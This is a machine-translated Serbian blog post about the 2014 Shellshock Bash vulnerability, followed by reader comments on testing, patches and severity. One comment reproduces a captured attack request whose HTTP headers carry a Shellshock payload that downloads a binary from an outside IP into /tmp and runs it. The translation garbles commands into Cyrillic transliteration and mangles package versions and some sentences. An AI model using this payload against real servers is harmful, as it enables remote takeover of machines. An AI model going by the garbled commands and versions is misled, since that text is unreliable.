Прича се као пожар на неким блоговима, прича објављена у сигурносни блог de rED ХАТ о рањивости пронађеној у Басху услед злоупотребе глобалних променљивих. Према првобитним вестима:
„... Рањивост је због чињенице да се променљиве окружења са посебно израђеним вредностима могу креирати пре позивања басх љуске. Ове променљиве могу садржати код који се извршава чим се позове љуска. Име ових разрађених променљивих није важно, већ само њихов садржај. Као резултат, ова рањивост је изложена у многим контекстима, на пример:
- ФорцеЦомманд користи се у ссхд конфигурацијама за пружање ограничених могућности извршавања наредби за удаљене кориснике. Ова мана се може користити да се то избегне и обезбеди произвољно извршавање наредбе. Неке имплементације Гит-а и Субверзије користе тако ограничене љуске. То не утиче на редовну употребу ОпенССХ-а јер корисници већ имају приступ конзоли.
- На Апацхе сервер који користи мод_цги или мод_цгид то утиче ако су ЦГИ скрипте написане и на басх-у или на нивоу нивоа. Такве подразине имплицитно користи систем / попен у Ц, ос.систем / ос.попен у Питхону, ако користи систем / екец љуску у ПХП-у (када се изводи у ЦГИ режиму) и опен / систем у Перлу (што зависи од низа наредби).
- На ПХП скрипте покренуте са мод_пхп то не утиче чак и ако се репродукују подразине.
- ДХЦП клијенти позивају скрипте љуске да би конфигурисали систем, са вредностима преузетим са потенцијално злонамерног сервера. То би омогућило извршавање произвољних наредби, обично као роот, на машини ДХЦП клијента.
- Разни демони и програми са СУИД привилегијама могу извршавати скрипте љуске са вредностима променљиве окружења које је корисник подесио / на које је утицао, што би омогућило извршавање произвољних наредби.
- Било која друга апликација која се прикачи на шкољку или покрене скрипту љуске попут употребе басха као тумача. Скрипте љуске које не извозе променљиве нису рањиве на овај проблем, чак и ако обрађују непоуздани садржај и складиште га у променљиве љуске (лево) и поднивои су отворени.
… »
Како знати да ли је мој басх погођен?
С обзиром на ово, постоји врло једноставан начин да сазнамо да ли смо погођени овом рањивошћу. У ствари, тестирао сам на свом Антергосу и очигледно немам проблема. Оно што морамо учинити је отворити терминал и ставити:
енв к = '() {:;}; ецхо рањив 'басх -ц "ехо ово је тест"
Ако изађе на овај начин, немамо проблема:
енв к = '() {:;}; ецхо рањиви 'басх -ц "ецхо ово је тест" басх: упозорење: к: игнорисање покушаја дефиниције функције басх: грешка при увозу дефиниције функције за `к' ово је тест
Ако је резултат другачији, требало би да користите канале за ажурирање наших омиљених дистрибуција да бисте видели да ли су они већ применили закрпу. Дакле, знате 😉
Ажурирано: Ово је резултат колеге који користи Убунту 14:04:
енв к = '() {:;}; ецхо рањив 'басх -ц "ецхо ово је тест" рањив ово је тест
Као што видите, до сада је рањив.
Имам Кубунту 14.04 од 64, а такође добијам:
енв к = '() {:;}; ецхо рањив 'басх -ц "ехо ово је тест"
рањива
ово је тест
Већ сам ажурирао, али не исправља. Шта да радим?
Сачекајте да се ажурирају. Већ је на пример ажуриран еОС .. 😀
Како чудно, имам и Кубунту 14.04
$ енв к = '() {:;}; ецхо рањив 'басх -ц "ехо ово је тест"
басх: упозорење: к: игнорирање покушаја дефиниције функције
басх: грешка при увозу дефиниције функције за `к '
ово је тест
Додајем да је верзија „басх“ пакета који је данас преузет:
КСНУМКС-КСНУМКСубунтуКСНУМКС
http://packages.ubuntu.com/trusty/bash
У мом случају, давањем команде, у терминалу ми даје само следеће:
>Свеједно, шала је у томе што сам ажурирао Дебиан Вхеези и то ме је бацило.
Вхеези је и даље осетљив на други део грешке, бар током поподнева (УТЦ -4: 30) проблем је и даље следио: /
Управо сам потврдио да након примене ажурирања јутрос то не утиче ни на Слацкваре ни на Дебиан ни на Центос јер су добили одговарајуће ажурирање.
Шта чини Убунту и даље рањивим у овом тренутку? И реците ми да је сигурно: Д.
Али да ли сте покушали да ажурирате Убунту?
Данашњим ажурирањем су такође то поправили.
OK
Стручњаци за безбедност упозоравају на рањивост „Басха“, могао би представљати већу претњу за кориснике Линук софтвера од недостатка Хеартблееда, где „хакери“ могу да искористе грешку у Басху да би преузели потпуну контролу над системом.
Тод Беардслеи, инжењерски менаџер у фирми за цибер сигурност Рапид7, упозорио је да је мана оцењена оценом 10 због своје озбиљности, што значи да има максималан утицај, и оцењена као "ниска" због сложености експлоатације, што значи да је "хакеру" релативно лако напади. Користећи ову рањивост, нападачи могу потенцијално да преузму контролу над оперативним системом, приступе поверљивим информацијама, изврше промене итд. “, Рекао је Беардслеи. „Свако са системима који заузимају Басх треба да одмах примени закрпу“, додао је он.
ПРИЈЕ ОВЕ РАЊИВОСТИ КОЈА ПРЕДСТАВЉА СТАРИ АЛАТ (ГНУ) на коме је домаћин Бах, било би погодније да се Линук софтвер реши ГНУ-а и замени за БСД алат.
ПС: не ЦЕНУЈТЕ моју слободу изражавања, ... не вређајте никога, ... немојте брисати моју поруку као претходну поруку да сам избрисан!.
Ох, молим те, не претеруј. Како мрзим оне људе који користе БСД и презиру ГНУ, Линук или било шта из ових пројеката.
Ја сам с вама и у потпуности сте у праву у погледу тежине ове рупе.
То није била цензура, то је био вишак (исти коментар сте дали у посту гноме 3.14)
«… И оцењено НИСКИМ ЗА СЛОЖЕНОСТ експлоатације, што значи да је релативно ЛАКО за хакерске нападе»
Да ли је приметна нескладност?
Како може бити лако искористити рањивост и истовремено имати „низак“ ниво ризика јер је тако сложен за употребу?
То је грешка која је решена у року од неколико сати од састанка и која, попут искрварења, нема извештаја да је експлоатисана (наравно, ово има мање времена за међусобно познавање).
То је више таблоидна штампа него стварни ризик.
Да ли вам се @Стафф чини неважним? Шта ћеш ми сада рећи?
ГЕТ./.ХТТП/1.0
.Корисник-агент: .Хвала-Роб
.Цоокие: (). {.:;.};. Вгет.-О./тмп/бесх.http://162.253.66.76/nginx; .цхмод.777. / тмп / бесх; ./ тмп / бесх;
.Хост: (). {.:;.};. Вгет.-О./тмп/бесх.http://162.253.66.76/nginx; .цхмод.777. / тмп / бесх; ./ тмп / бесх;
.Реферер: (). {.:;.};. Вгет.-О./тмп/бесх.http://162.253.66.76/nginx; .цхмод.777. / тмп / бесх; ./ тмп / бесх;
.Прихвати :. * / *
$ датотека нгинк
нгинк: ЕЛФ 32-битна ЛСБ извршна датотека, Интел 80386, верзија 1 (СИСВ), статички повезана, за ГНУ / Линук 2.6.18, уклоњена
$ мд5сум нгинк
5924bcc045bb7039f55c6ce29234e29a nginx
$ сха256сум нгинк
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Знате ли шта је то? Од мало опасног ...
Ситуација је прилично озбиљна, али одатле да кажете да треба да престанете да користите басх за БСД опцију, то је већ највише, у сваком случају ажурирање је већ ту, само додирнем упдате и ништа друго.
Сада ПД, мислим да је то више колега @робет, не мислим да су овде администратори посвећени брисању оваквих коментара јер да, јер, откако сам учествовао у овој заједници, имам такав осећај и надам се да ће тако и остати начин.
Поздрав.
Потпуно исти коментар стављате на два различита поста. Ако покушавате да промовишете „извор“ вести, извините, ово није место.
Басх долази из Уника (и његовог ГНУ клона). Погођени су и системи засновани на БСД-у, попут ОСКС-а, а према речима Генбете, они то још увек нису закрпили. Исто тако, за приступ Басх-у потребан вам је кориснички налог, локални или путем ССХ-а.
@Стафф:
1.- Класификован је као Ниво 10 (максимални ниво опасности) због количине услуга на које грешка може утицати. У главној белешци ту чињеницу чине врло јасном, тврдећи да грешка може утицати на услуге као што су апацхе, ссхд, програми са суид дозволама (корг, између осталог).
2.- Класификован је као низак ниво тешкоће када је у питању његова примена, а најбољи пример за то је скрипта за тестирање рањивости коју је @елав поставио у објави. Као што видите, врло је тешко применити.
Не видим сувишност информација (видим само Гоогле превод) и ако је проблем прилично озбиљан, а како кажете, већ има закрпу и решење, али не и за то, више није ризик, и сасвим стварна.
@петерцхецо / @Иукитеру
Немојте ме погрешно схватити, мислим да је јасно да су моје критике вести које Робет повезује и усредсређене су на нескладност, а не на вишак.
На исти начин, морамо да разликујемо ризик и опасност (последње не спомињем), обично их користимо као синониме, али овде би опасност представљала способност оштећења грешке и ризиковала вероватноћу њеног настанка.
У мом конкретном случају, ушао сам од јуче. Није то било због маилинг листа или нечег сличног, већ за дистрибуцију на радној површини! Подигао сам телефон и послао поруку сисадмин-у са везом и потврдио да сам све закрпао, а затим ме извините, али ове вести ме не држе будним.
На другим форумима спомињу рањивост Басх, „решење које су објавили Дебиан и Убунту“, али данас су открили да рањивост и даље постоји, па је решење било непотпуно, они то помињу!
Видим да су ме многи критиковали због једноставне чињенице спречавања људи од озбиљности рањивости - квалификоване нивоом 10 максималне опасности, и помињања могућих решења за Линук софтвер пре застарелог ГНУ алата на коме је домаћин Басх - што би савршено могао ГНУ бити замењен алатом БСД у Линук софтверу, ... Такође користим Линук и волим Линук!
Појашњавам да Басх не долази подразумевано инсталиран у БСД, то је још један пакет компатибилности са Линуком који се може инсталирати у БСД ... да! А извор је стављен тако да могу да провере вести, јер многи корисници понекад не верују у поруку или коментар.
робет: Као што су вам већ понављали, ваш коментар са вестима већ стављате у пост, не морате да га стављате у сваки пост који коментаришете.
На басху, постоје и друге љуске које се могу користити у случају да је Басх рањив. 😉
Робет, за који знам да не постоји софтвер који комбинује линук језгро са БСД корисничком земљом. Најближе је обрнуто, кБСД + ГНУ, као што то раде Гентоо и Дебиан. Поред тога, ГНУ (1983) не би могао да се назове „застарелим“ ако је после БСД (1977). Обоје деле свој уник роот (али не и код), не би било „Линук компатибилности“ да је Басх креиран док је Линус Т још увек био дете.
уфф, дебиан тестирање у овом тренутку је "рањиво" какав низ имамо ...
Користим Дебиан тестирање и чак смо у овој грани добили басх ажурирање
према генбети постоји и друга рањивост
http://seclists.org/oss-sec/2014/q3/685
наредба за упит је
енв Кс = '() {(а) => \' сх -ц "јека рањива"; басх -ц "ецхо Фаилуре 2 унпатцхед"
енв Кс = '() {(а) => \' сх -ц "јека рањива"; басх -ц "ецхо Унпатцхед Фаилуре 2" сх: Кс: линија 1: синтаксичка грешка у близини неочекиваног елемента `= 'сх: Кс: линија 1:`' сх: грешка при увозу дефиниције функције за `Кс 'сх - Рањива - Отказана грешка 2 команда није пронађенаисти ја.
Исто овде. Али оригинална грешка у посту је закрпана у (Л) Убунту 14.04
Уместо да обичним одјеком покушам да извршим инструкцију која захтева привилегије, бацам „недовољне привилегије“ ... ова грешка не ескалира привилегије? Ако не ескалира привилегије, онда није толико опасна колико је сликају.
У праву си!! биле су две рањивости ...
Мени у Линук Минт 17 након другог басх ажурирања које су синоћ ставили у Убунту спремишта, након извршавања те наредбе љуска нуди овај излаз:
енв Кс = '() {(а) => \' сх -ц "јека рањива"; басх -ц "ецхо Фаил 2 унпатцхед"
>
Верзија „бассх“ -а која је стављена у Убунту-ове репозиторијуме ради ажурирања претходних је:
КСНУМКС-КСНУМКСубунтуКСНУМКС
На системима изведеним из Дебиана можете провјерити инсталирану верзију овом наредбом:
дпкг -с басх | греп верзија
У сваком случају, то треба разјаснити, барем за кориснике Дебиана, Убунту-а и Минт-а; Не бисте требали бити превише забринути са програмима који изводе скрипте са заглављем #! / Бин / сх, јер на тим дистрибуцијама / бин / сх не зове "басх", већ се веже за љуску "цртица" (цртица је :)
Дебиан Алцхемист Цонсоле (цртица) је изведена ПОСИКС конзола
од пепела.
.
С обзиром да извршава скрипте брже од басха и има мање зависности
библиотеке (што га чини робуснијим против софтверских кварова или
хардвер), користи се као подразумевана системска конзола на системима
Дебиан.
Дакле, бар у Убунту-у, „басх“ се користи као љуска за пријављивање корисника (такође за роот корисника). Али сваки корисник може подразумевано да користи другу љуску за корисника и за роот конзоле (терминале).
Лако је проверити да ли љуска извршава скрипте (#! / Бин / сх) извршавањем ових наредби:
датотека / бин / сх
(излаз је / бин / сх: симболична веза до `цртице`) пратимо траг понављајући наредбу
датотека / бин / цртица
(излаз је / бин / дасх: ЕЛФ 64-битни ЛСБ дељени објекат, к86-64, верзија 1 (СИСВ), па је ово извршна датотека.
Ово су резултати дистрибуције Линук Минт 17. На осталим дистрибуцијама које нису Убунту / Дебиан, они се могу разликовати.
Није тешко променити подразумевану љуску !! чак можете користити и другу за кориснике и за основног корисника. Заправо морате само да инсталирате љуску по вашем избору и промените подразумевану помоћу команде „цхсх“ или уређивањем датотеке / етц / пассвд (мада корисници који не знају последице грешке приликом уређивања датотеке „пассвд“, боље је да се врло добро информишу и пре него што га уреде, направе копију оригинала у случају да је потребно да га поврате)
Осећам се пријатније уз „тцсх“ (тцсх је :)
ТЕНЕКС Ц конзола, побољшана верзија Беркелеи ЦСХ
„Цсх“ је оно што је Мац ОС Кс користио пре неколико година. Нешто логично с обзиром на то да је већи део Аппле-овог оперативног система ФрееБСД код. Из онога што сам јуче прочитао, чини се да они такође пружају „басх“ за корисничке терминале.
ЗАКЉУЧЦИ:
- Закрпљене „басх“ верзије „за најчешће коришћене дистрибуције“ су већ дистрибуиране
- „басх“ верзија 4.3-7убунту1.2 и новије верзије не садржи ове грешке
- Није обавезно користити „басх“ у ОС * Линук
- Неколико * Линук дистрибуција повезује #! / Бин / сх са "басх"
- Постоје алтернативе: асх, цртица, цсх, тцсх и неке друге
- Није компликовано променити подразумевану љуску коју систем позива приликом отварања терминала
- Мало малих уређаја (рутера и других) користи „басх“, јер је веома велик !!
Тренутно је управо стигло још једно ажурирање које инсталира другу верзију "басх" 4.3-7убунту1.3
За Линук Минт 17 и Убунту 14.04.1 ЛТС
АрцхЛинук је ушао у верзију басх-4.3.026-1
@ Ксурко ... .цсх из Беркелеи-а?, ... Разумете нешто од онога што горе говорим, и боље је користити БСД „цсх“ ... уместо старог ГНУ алата где је Басх хостован. Тај алат је најбољи за Линук софтвер.
Претпостављам да је ово грешка
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
истина?
А шта би било решење?
Сачекајте да ажурирају пакет на вашој дистрибуцији 😉
Стеница је крштена као шкољка
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
рањива
ово је тест
Још нема закрпе за Убунту Студио 14.04
Поправљено у Убунту Студио 14.04.1
висп @ убунтустудио: ~ $ енв к = '() {:;}; ецхо рањив 'басх -ц "ехо ово је тест"
басх: упозорење: к: игнорирање покушаја дефиниције функције
басх: грешка при увозу дефиниције функције за `к '
ово је тест
Заправо је то мања рањивост, ако на вас утиче, то је да сте раније радили нешто погрешно ...
Јер басх скрипта која се извршава са роот привилегијама никада не би смела бити изложена кориснику. А ако трчи без привилегија, такве рањивости нема. Заправо је глупо. Много плашљивости.
Мислим исто.
Тачно, ако продате више новина или остварите више посета, ове грешке су добре.
Али увек забораве да напомену да да бисте компромитовали рачунар оваквим врстама скрипти, прво морате имати приступ басху, а затим га имати као роот.
особље ако користите апацхе са цги-јем, само ставите хттп заглавља као колачиће или референцу функцију коју желите да извршите. Чак се користио за ширење црва.
и ако неко стави љуску на сервер са вгет мисхелл.пхп, у том случају то није озбиљно, зар не?
Слажем се са вама. Мислио сам да је то велика грешка попут оне у Хеартблеед-у (чак се и НСА позајмљивала да потпомаже морбидитет), али ипак је то била мања грешка.
Постоје и друге заиста озбиљне грешке као што су луда потрошња Фласх-а и пад перформанси у Пеппер Фласх Плаиер-у, и она која је већ исправљена грешка у вебРТЦ-у у Цхроме-у и Фирефок-у.
Да ли знате да ли постоји аранжман за људе који имају Линук Минт 16?
У Дебиан тестирању то је већ било поправљено.
У мојих 5 дистрибуција је решено, у мом ОС Кс не знам.
Молим вас, немојте цензурисати мој коментар, рекао сам ОС Кс. Не знам да ли можете да кажете ОС Кс на овој страници.
@иоио, немој превише да се излуђујеш да још увек раде на неким детаљима закрпе ... пробај ово па ми реци, ходај КСД
енв к = '() {:;}; ецхо рањив 'басх -ц "ецхо рањивији сам од ипхоне 6 смећа"
Да ако се 100% реше пре ОС Кс, кладим се у било шта
Па, чак и у Арс Тецхници дају значај Басху у ОСКС-у.
@Иоио следећи коментар на ОС Кс за СПАМ .. лла ту саве .. 😛
@иоио тамо да поправи цитате ... али остало знате 😉
ФСС је говорио
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Као да су постали покровитељи ОСКС-а (јер ОСКС и даље користи Басх: в).
У сваком случају, не морам се толико петљати са Дебиан Јессие.
Ако је систем рањив на Цент ОС:
иум очисти све && иум упдате басх
да видите басх верзију:
рпм -ка | греп басх
Ако је верзија старија од басх-4.1.2-15.ел6_5.1, ваш систем је можда рањив!
Поздрав.
Друга рањивост још није решена
енв амвариабле2 = '() {(а) => \' сх -ц "ецхо амВулнерабле"; басх -ц "ецхо Фаилуре 2 унпатцхед"
Ажурирање ...
У Гентоо-у ми се дешава супротно, рањив сам само на први неуспех, али са другим добијам ово:
[код] сх: Кс: ред 1: синтаксичка грешка у близини неочекиваног елемента `= '
сх: Кс: линија 1: ''
сх: грешка при увозу дефиниције функције за `Кс '
сх: рањив: команда није пронађена
Грешка 2 није закрпана
[/ код]
Не знам да ли ће већ постојати стабилна верзија Басха са исправљеним грешкама, али у сваком случају ће бити на чекању следећи пут када направим емерге –синц && емерге –упдате –дееп –витх-бдепс = и - невусе @ворлд (тако кораком ажурирам цео систем).
Имам Гентоо са верзијом 4.2_п50 и до сада је прошао све тестове. Покушајте са емергинг –синц, а затим са емергинг -ав1 апп-схеллс / басх, а затим проверите да ли имате верзију 4.2_п50 помоћу команде басх –версион.
Јесте ли пробали ово?
А са новим пакетима, нови тест који нам пружа Ред Хат
цд / тмп; рм -ф / тмп / ецхо; енв 'к = () {(а) => \' басх -ц "датум одјека"; мачка / тмп / ехо
Ако наш систем није рањив и исправно је закрпљен, мора нам пружити овако нешто
1 датум
2 мачка: / тмп / ецхо: Датотека или директоријум не постоје
Покушајте на овај начин:
енв Кс = '() {(а) => \' сх -ц "јека рањива"; басх -ц "ецхо Фаилуре 2 патцхед"
добијам
рањива
Исправљена грешка 2.
Заборави, линија је лоше форматирана.
Одлично! Већ сам обавио ажурирање свог Слацкваре-а, хвала!
Здраво, поставља се питање, имам неколико сервера са „СУСЕ Линук Ентерприсе Сервер 10“ 64 бита.
Када извршавам наредбе осетљив сам, чак сам рањивији од смећа иПхоне 6 кД
Ако се не варам да ажурирам / инсталирам пакете у СУСЕ, то се врши наредбом «зиппер».
На неким серверима ми говори ово:
БИАЛ: ~ # зиппер горе
-басх: зиппер: наредба није пронађена
БИАЛ: ~ #
А код осталих ово:
СМБ: ~ # зиппер горе
Враћање системских извора ...
Рашчлањивање метаподатака за СУСЕ Линук Ентерприсе Сервер 10 СП2-20100319-161944…
Рашчлањивање РПМ базе података ...
Резиме:
Нема шта да се ради.
Шта ја радим?
Знам да неки кажу да је рањивост мања од оне коју сликају, али ја је имам и не желим да будем изложена ризику, била она мала или велика.
Поздрав.
Добро вече, покушао сам да налепите код који сте навели у чланку, схватам
сандерс @ пц-сандерс: ~ $ енв к = '() {:;}; ецхо рањив 'басх -ц "ехо ово је тест"
ово је тест
сандерс @ пц-сандерс: ~ $
Да ли бисте ми објаснили како да закрпим дистро, ажурирам свакодневно и не видим никакве промене у промптном излазу.
Хвала вам пуно!